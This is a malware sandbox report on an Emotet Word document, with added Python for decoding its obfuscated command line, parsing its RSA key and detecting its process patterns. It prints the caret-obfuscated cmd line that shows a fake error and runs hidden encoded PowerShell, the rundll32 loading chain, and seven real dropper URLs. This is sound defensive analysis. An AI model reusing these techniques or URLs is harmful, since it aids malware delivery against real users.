
Analysis Report Mensaje-22-012021.doc

Overview

General Information

Sample Name: Mensaje-22-012021.doc
Analysis ID: 343897
MD5: 5023f52efbf71865041baf66ae8411cb
SHA1: dc2aabc9b019199d32c000a8e18e63cafa4fbfd3
SHA256: f4f41ebd2b517564f8764fa21faa2b1a824694e29cb31a2f149245e7bd42ab24

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2436 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2384 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2528 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2324 cmdline: powershell -w hidden -enc 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2032 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2732 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 972 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2908 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 824 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2188 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 3028 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2992 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 1476 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 1948 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 1836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 884 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                              • rundll32.exe (PID: 2536 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                • rundll32.exe (PID: 2288 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                  • rundll32.exe (PID: 2888 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                    • rundll32.exe (PID: 2308 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                      • rundll32.exe (PID: 2700 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                        • rundll32.exe (PID: 152 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                          • rundll32.exe (PID: 964 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup
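
The cmd.exe command line in the tree above hides msg and powershell behind cmd.exe caret escapes (m^s^g, p^owe^rs^he^ll^), shows the user a fake "Word experienced an error" dialog, and hands PowerShell a base64 UTF-16LE script through -enc. The Python below is an added worked example, not part of the Joe Sandbox report: it strips the carets, splits the resulting stages on the cmd.exe "&" separator, and decodes the -EncodedCommand payload. Because the report redacts the real payload, the sample command line encodes a harmless stand-in script; the URL-list splitter is run on the "!"-joined list the report found in powershell.exe memory (listed under Networking below).

```python
import base64
import re
from typing import Optional
from urllib.parse import urlsplit


def strip_carets(cmdline: str) -> str:
    """Undo cmd.exe caret escaping: '^' makes the next character literal, so
    'p^owe^rs^he^ll^ -w' becomes 'powershell -w' and '^^' becomes '^'."""
    out = []
    i = 0
    while i < len(cmdline):
        if cmdline[i] == "^" and i + 1 < len(cmdline):
            out.append(cmdline[i + 1])
            i += 2
        else:
            out.append(cmdline[i])
            i += 1
    return "".join(out)


# -e / -ec / -en / -enc / -encodedcommand followed by the base64 blob
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind powershell -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16le")


def triage_cmdline(cmdline: str) -> dict:
    """De-obfuscate a cmd.exe command line and pull out what it actually runs."""
    plain = strip_carets(cmdline)
    stages = [s.strip() for s in plain.split("&") if s.strip()]
    return {"plain": plain, "stages": stages, "script": decode_encoded_command(plain)}


def split_dropper_urls(blob: str, sep: str = "!") -> list:
    """Split the sep-joined download URL list the loader keeps in memory into hostnames."""
    return [urlsplit(u).hostname for u in blob.split(sep) if u]


# Constructed sample: the report's cmd.exe line with its redacted -enc payload replaced by a
# harmless script encoded the way PowerShell expects it (UTF-16LE, then base64).
SAMPLE_SCRIPT = "Write-Output 'stand-in for the redacted downloader'"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")
SAMPLE_CMDLINE = (
    "cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. "
    "& p^owe^rs^he^ll^ -w hi^dd^en -^e^nc " + SAMPLE_B64
)

# URL list exactly as the report found it in powershell.exe memory
DROPPER_BLOB = (
    "http://uagritech.com/cgi-bin/a5G/!http://www.91yudao.com/wp-admin/KKHt1/!"
    "http://yourcleanersurfaces.com/four-monks-acasz/O2my/!http://laymancoder.com/rustic-decor-1gbad/Us/!"
    "https://rbdck.com/wp-content/uploads/sucuri/lewfK/!https://fifacoinsbox.com/wp-content/7gYt/!"
    "http://seamart.info/alfacgiapi/q92A/"
)

if __name__ == "__main__":
    result = triage_cmdline(SAMPLE_CMDLINE)
    for stage in result["stages"]:
        print("stage:", stage)
    print("decoded script:", result["script"])
    print("dropper hosts:", split_dropper_urls(DROPPER_BLOB))
```

The first stage that falls out is the decoy (msg %username% /v Word experienced an error ...), the second is the hidden PowerShell; on a real capture the decoded script is where the seven download URLs and the DLL drop path (C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll in this run) come from.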

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}
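
The RSA Public Key in the configuration above is a base64 DER SubjectPublicKeyInfo with the line breaks of its original PEM body still embedded as "\n". The Python below is an added example, not part of the report and not Joe Sandbox's extractor: a minimal DER reader (no third-party library) that recovers the modulus and exponent from exactly that string. It shows the key is a 768-bit RSA key with e = 65537; since samples that share a C2 public key belong to the same botnet infrastructure, the key is a useful pivot when clustering Emotet documents.

```python
import base64
import json

# Configuration block exactly as printed in the report (JSON, with the PEM-style "\n" breaks)
EMOTET_CONFIG = (
    r'{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\n'
    r'uS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n'
    r'6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}'
)

RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")   # 1.2.840.113549.1.1.1


def read_tlv(buf: bytes, pos: int):
    """Read one DER tag-length-value at pos; returns (tag, value, position after it)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits give the length-of-length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_spki(der: bytes):
    """Walk SubjectPublicKeyInfo -> AlgorithmIdentifier + BIT STRING(RSAPublicKey); return (n, e)."""
    tag, spki, _ = read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("SubjectPublicKeyInfo must be a SEQUENCE")
    tag, alg, pos = read_tlv(spki, 0)
    oid_tag, oid, _ = read_tlv(alg, 0)
    if tag != 0x30 or oid_tag != 0x06 or oid != RSA_ENCRYPTION_OID:
        raise ValueError("not an rsaEncryption key")
    tag, bits, _ = read_tlv(spki, pos)
    if tag != 0x03 or bits[0] != 0:
        raise ValueError("expected BIT STRING with no unused bits")
    tag, rsapub, _ = read_tlv(bits, 1)          # skip the unused-bits octet
    if tag != 0x30:
        raise ValueError("RSAPublicKey must be a SEQUENCE")
    n_tag, n_bytes, pos = read_tlv(rsapub, 0)
    e_tag, e_bytes, _ = read_tlv(rsapub, pos)
    if n_tag != 0x02 or e_tag != 0x02:
        raise ValueError("modulus and exponent must be INTEGERs")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def describe_emotet_key(config_json: str) -> dict:
    """Decode the key from an extracted Emotet config and summarise its parameters."""
    key_b64 = json.loads(config_json)["RSA Public Key"]
    der = base64.b64decode("".join(key_b64.split()))  # drop the embedded line breaks
    n, e = parse_rsa_spki(der)
    return {
        "der_bytes": len(der),
        "modulus_bits": n.bit_length(),
        "exponent": e,
        "modulus_hex_prefix": format(n, "x")[:16],   # handy as a short key fingerprint
    }


if __name__ == "__main__":
    print(describe_emotet_key(EMOTET_CONFIG))
```

The same string can be checked with any standard tool that accepts a PEM public key (wrap it in BEGIN/END PUBLIC KEY lines); the hand-written reader is only here so the structure the config carries is visible.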

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000014.00000002.2315698763.0000000000220000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0000000B.00000002.2216468622.00000000001B0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0000000B.00000002.2216501392.0000000000210000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000010.00000002.2272217705.0000000000200000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000017.00000002.2351060980.0000000000290000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(46 entries in total; the first five are shown here)

Unpacked PEs

Source | Rule | Description | Author
12.2.rundll32.exe.10000000.3.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
18.2.rundll32.exe.10000000.3.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
7.2.rundll32.exe.210000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
9.2.rundll32.exe.2b0000.1.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
14.2.rundll32.exe.6d0000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(97 entries in total; the first five are shown here)

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal
Source: Process started | Author: Florian Roth
  Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1
  CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\SysWOW64\rundll32.exe
  NewProcessName: C:\Windows\SysWOW64\rundll32.exe
  OriginalFileName: C:\Windows\SysWOW64\rundll32.exe
  ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
  ParentImage: C:\Windows\SysWOW64\rundll32.exe
  ParentProcessId: 2732
  ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1
  ProcessId: 972

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis
  Command: powershell -w hidden -enc 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
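
Both Sigma hits above key on command-line shape: a rundll32 export called by ordinal (",#1") and an encoded, hidden PowerShell invocation. The Python below is an added example, not Joe Sandbox code and not the Sigma rules themselves: it reapplies those two checks and adds the other rundll32 traits visible in the process tree (a module with a non-DLL extension such as .tfa or .ifu, a module loaded from the user profile) and cmd.exe caret obfuscation, then runs them over process-creation records copied from the Startup tree. The extension allow-list is an assumption made for this illustration, and the PowerShell payload is a placeholder because the report redacts it.

```python
import re

# Process-creation records copied from the report's Startup tree: (pid, image, command line).
# The PowerShell payload is a placeholder because the report redacts it.
EVENTS = [
    (2384, "cmd.exe",
     "cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. "
     "& p^owe^rs^he^ll^ -w hi^dd^en -^e^nc <payload redacted in the report>"),
    (2528, "msg.exe", "msg user /v Word experienced an error trying to open the file."),
    (2324, "powershell.exe", "powershell -w hidden -enc <payload redacted in the report>"),
    (2032, "rundll32.exe", r"'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString"),
    (972, "rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1"),
    (2908, "rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN"),
    (824, "rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1"),
]

MODULE_RE = re.compile(r"rundll32\.exe'?\s+'?([^'\s,]+)")      # first argument = module path
ORDINAL_RE = re.compile(r",#\d+\b")                            # export referenced by ordinal
ENC_RE = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s")               # candidate -EncodedCommand prefixes
HIDDEN_RE = re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden\b")
# Assumption for this example: the extensions rundll32 is normally handed in this environment.
RUNDLL32_EXPECTED_EXT = {"dll", "cpl", "ocx", "ax"}


def rundll32_module(cmdline: str):
    """Path of the module rundll32 was asked to load, or None if it cannot be parsed."""
    m = MODULE_RE.search(cmdline)
    return m.group(1) if m else None


def file_extension(path: str) -> str:
    name = path.rsplit("\\", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def has_encoded_command(cmdline: str) -> bool:
    # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
    return any("encodedcommand".startswith(p.lower()) for p in ENC_RE.findall(cmdline))


def evaluate(image: str, cmdline: str) -> list:
    """Return the names of the checks a single process-creation record trips."""
    hits = []
    img = image.lower()
    if img == "rundll32.exe":
        if ORDINAL_RE.search(cmdline):
            hits.append("rundll32_call_by_ordinal")          # the report's first Sigma hit
        module = rundll32_module(cmdline)
        if module:
            if file_extension(module) not in RUNDLL32_EXPECTED_EXT:
                hits.append("rundll32_module_unusual_extension")
            if module.lower().startswith("c:\\users\\"):
                hits.append("rundll32_module_in_user_profile")
    elif img == "cmd.exe" and cmdline.count("^") >= 5:
        hits.append("cmd_caret_obfuscation")
    elif img == "powershell.exe":
        if has_encoded_command(cmdline):
            hits.append("powershell_encoded_command")       # the report's second Sigma hit
        if HIDDEN_RE.search(cmdline):
            hits.append("powershell_hidden_window")
    return hits


def scan(events) -> dict:
    """Map pid -> tripped checks for every record that tripped at least one."""
    findings = {}
    for pid, image, cmdline in events:
        hits = evaluate(image, cmdline)
        if hits:
            findings[pid] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in scan(EVENTS).items():
        print(pid, ", ".join(hits))
```

The ordinal check alone fires on two of the rundll32 records; the extension check is what separates the renamed payloads in C:\Windows\SysWOW64\<random>\ from a legitimate DLL, and the user-profile check catches the first stage before it is copied there. In production these belong in the SIEM's process-creation rules, not in a script, but the logic is the same.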

                      Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://fifacoinsbox.com/wp-content/7gYt/ | Avira URL Cloud: Label: malware
Source: http://yourcleanersurfaces.com/four-monks-acasz/O2my/ | Avira URL Cloud: Label: malware
Source: http://www.91yudao.com/wp-admin/KKHt1/ | Avira URL Cloud: Label: malware
Source: http://seamart.info/alfacgiapi/q92A/ | Avira URL Cloud: Label: malware
Source: https://rbdck.com/wp-content/uploads/sucuri/lewfK/ | Avira URL Cloud: Label: malware
Source: http://uagritech.com/cgi-bin/a5G/ | Avira URL Cloud: Label: malware
Source: http://laymancoder.com/rustic-decor-1gbad/Us/ | Avira URL Cloud: Label: malware
Source: http://seamart.info/alfacgiapi/q92A/P | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: www.91yudao.com | Virustotal: Detection: 7%
Source: yourcleanersurfaces.com | Virustotal: Detection: 9%
Multi AV Scanner detection for submitted file
Source: Mensaje-22-012021.doc | Virustotal: Detection: 61%
Source: Mensaje-22-012021.doc | Metadefender: Detection: 32%
Source: Mensaje-22-012021.doc | ReversingLabs: Detection: 62%
Source: 24.2.rundll32.exe.10000000.0.unpack | Avira: Label: TR/Spy.Gen

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.pdbom | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\d | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdbge | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source: Binary string: System.pdb | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbdb | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdb | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb | source: powershell.exe, 00000005.00000002.2156319928.0000000002030000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdb | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: uagritech.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 162.241.253.129:80
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 162.241.253.129:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp | String found in memory: http://uagritech.com/cgi-bin/a5G/!http://www.91yudao.com/wp-admin/KKHt1/!http://yourcleanersurfaces.com/four-monks-acasz/O2my/!http://laymancoder.com/rustic-decor-1gbad/Us/!https://rbdck.com/wp-content/uploads/sucuri/lewfK/!https://fifacoinsbox.com/wp-content/7gYt/!http://seamart.info/alfacgiapi/q92A/
Source: global traffic | HTTP traffic detected: GET /cgi-bin/a5G/ HTTP/1.1 | Host: uagritech.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1 | Host: uagritech.com
Source: global traffic | HTTP traffic detected: GET /four-monks-acasz/O2my/ HTTP/1.1 | Host: yourcleanersurfaces.com | Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: HVC-AS (US)
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1 (US)
Source: Joe Sandbox View | ASN Name: TENCENT-NET-AP-CN Tencent Building Kejizhongyi Avenue (CN)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{51E1E6FE-FC7D-43F0-B5EC-EA333295AFA3}.tmp
Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: uagritech.com
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp | String found in binary or memory: http://laymancoder.com/rustic-decor-1gbad/Us/
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2165767085.0000000002460000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp | String found in binary or memory: http://seamart.info/alfacgiapi/q92A/
Source: powershell.exe, 00000005.00000002.2167131717.0000000002D44000.00000004.00000001.sdmp | String found in binary or memory: http://seamart.info/alfacgiapi/q92A/P
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2169891604.0000000003BF2000.00000004.00000001.sdmp | String found in binary or memory: http://uagritech.com
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2170760587.000000001B54A000.00000004.00000001.sdmp | String found in binary or memory: http://uagritech.com/cgi-bin/a5G/
Source: powershell.exe, 00000005.00000002.2169891604.0000000003BF2000.00000004.00000001.sdmp | String found in binary or memory: http://uagritech.com/cgi-sys/suspendedpage.cgi
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2165767085.0000000002460000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2184265558.00000000027D0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
